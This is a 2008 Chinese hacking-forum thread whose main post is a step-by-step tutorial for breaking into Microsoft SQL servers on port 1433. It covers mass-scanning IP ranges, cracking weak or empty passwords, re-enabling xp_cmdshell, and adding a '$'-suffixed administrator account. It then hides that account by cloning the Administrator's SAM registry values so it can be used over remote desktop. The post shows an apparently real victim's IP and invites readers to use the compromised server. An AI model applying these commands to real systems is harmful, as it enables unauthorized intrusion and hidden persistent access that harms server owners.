找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 2908|回复: 6

1433拿服务器+隐藏管理员帐号

[复制链接]

29

主题

358

回帖

139

牛毛

一级牛人

积分
139
QQ
发表于 2008-6-23 20:57:26 | 显示全部楼层 来自 湖南省株洲市醴陵市
顶 看到了

2

主题

17

回帖

26

牛毛

初生牛犊

积分
26
发表于 2008-6-23 20:59:16 | 显示全部楼层 来自 河南省周口市
支持你!!! [s:121]

25

主题

283

回帖

417

牛毛

一级牛人

积分
417
发表于 2008-6-23 21:03:34 | 显示全部楼层 来自 河北省保定市
这个ji不好抓

1

主题

74

回帖

101

牛毛

一级牛人

积分
101
发表于 2008-6-24 14:44:19 | 显示全部楼层 来自 福建省福州市
学习了 [s:119]

18

主题

236

回帖

323

牛毛

一级牛人

积分
323
发表于 2008-7-16 13:59:33 | 显示全部楼层 来自 吉林省通化市辉南县
顶~~~~~~~~~~~~~

4

主题

38

回帖

57

牛毛

初生牛犊

积分
57
发表于 2008-7-18 00:34:59 | 显示全部楼层 来自 广东省广州市荔湾区
1433...要看..类似教程多点
才会懂的抓的

614

主题

3047

回帖

4905

牛毛

二级牛人

站长

积分
4995
 楼主| 发表于 2008-6-23 19:53:32 | 显示全部楼层 |阅读模式 来自 四川省泸州市
大家好我是hacktale第一次做教程,很紧张。如果有什么做的不好请大家不要怪我。呵呵!
今天我要做的教程是1433入侵服务器+隐藏管理员账号
用到的工具1.s扫描器
2.SQL综合利用工具
3.scansql批量处理工具,或者用X-Scan-v3.3
4.用到sql查询分析器
5.3389连接工具(2003和xp自带有远程连接工具)
大家看我的操作

1.首先用服务器扫一段开了1433端口的ip
2.扫描好之后,1433弱口令猜解工具即上面提到的scansql批量处理工具,或者用X-Scan-v3.3
3.用SQL综合利用工具连接并添加管理员账号
4.用3389连接器

s扫描器s.exe syn ip地址 端口号 /save(保存)
这个大家应该都知道是什么意思吧!
等它扫描一下.syn扫描很快.在xp系统下要打补丁才可以用。我的服务器是2003系统的,不用打补丁就可以用s扫描,看扫出来很多开放1433的IP
扫描完后它会自动保存到他所在的目录下,大家稍等下。看来这个段的IP开放1433端口很多.啊终于扫万了。呵呵
好把IP处理一下,
因为要用到scansql批量处理工具,所以IP段前面要加上scansql
处理完之后,可以将txt文件保存为bat为后缀的文件,为了快点扫到服务器的弱口令,我们可以多保存几个bat文件,好大家看我操作
已经开始破解弱口令了,大家等一下

还没有扫到,可能是有点慢呵呵!
好了我们看下有没有扫到弱口令。大家看扫到弱口令了。[NULL]表示
空口令.
我们用SQL综合利用工具连接一下,随便选个 我这有点卡...我就用服务器连接,服务器连接就是快,呵呵
好连接成功.我们看下能执行dos命令不,不可以
未能找到存储过程 'master..xp_cmdshell'。很多朋友遇到这种情况就不知道怎么办了,我们就要用到sql查询分析器,大家看我的操作,,打开的有点慢.打开了我们连接服务器
然后第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕....一般情况执行第一步就可以了。好看我操作
可以执行dos命令了,我们查看服务器是什么系统dos口令是type C:\\boot.ini
Windows Server 2003,说明服务器是2003系统.
查看一下服务器是内网还是外网一般我们都要外网的肉鸡,这样可以做很多事
dos口令是ipconfig 看下
Connection-specific DNS Suffix . :  IP Address. . . . . . . . . . . . : 210.26.7.88  Subnet Mask . . . . . . . . . . . : 255.255.255.0  Default Gateway . . . . . . . . . : 210.26.7.1
说明服务器是外网
说明服务器是外网,查看一下有多少管理员dos口令net user
netstat -an是查看服务器开放的端口,我们要入侵服务器可定要开放3389端口如果没有开,网上有很多开3389的工具。不过很多都要做免杀,我们看下他开了3389没有。
TCP  0.0.0.0:3389     0.0.0.0:0       LISTENING
说明服务器开了3389端口。我们开始添加管理吧!
net user admin$ !@#$ab1 /add这个就是添加管理员的dos口令admin$是用户名后面加个$号是想在dos下查看不到.密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历史的要求。这个也很好解决,密码要复杂一点一般都在6位以上.我们去试下可以了,很多国外的服务器也是这样但是都很简单就搞定了
然后我们提升权限net localgroup administrators admin$ /add这是dos下提升管理的口令,现
我用服务器连接下看好连接成功
下面大家看我的操作
我们来做影藏管理员账号。
首先打开注册表regedit
打开后找到sam
然后添加权限HKEY_LOCAL_MACHINE\\SAM\\SAM
然后按F5刷新下

然后依次点HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
可以看出有人入侵过
我们删掉完成,我们打开注册表f5刷新下
我们从新建个管理员net user hacktale$ !@#$ab1 /add
我们看hacktale$在注册表对应的类型是 406
找到 406  1f4是administrator对应的键值,然后我们将administrator所对应的直下的f直覆盖hacktale$下的F直
然后将406 和hacktale$对应的注册表导出
然后删除hacktale$,然后导入刚才导出的注册表文件
好了隐藏了账号并提升了权限我们注销然后在进一次看看,用hacktale$能进入不可以进入
而且看桌面上多了很多东西,因为我们是以超级管理员登陆的而且不会被人发现.好了教程到此
服务器的密码我不该要的朋友进去拿吧!


下载地址:点击下载
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-12 21:55 , Processed in 0.142263 second(s), 46 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表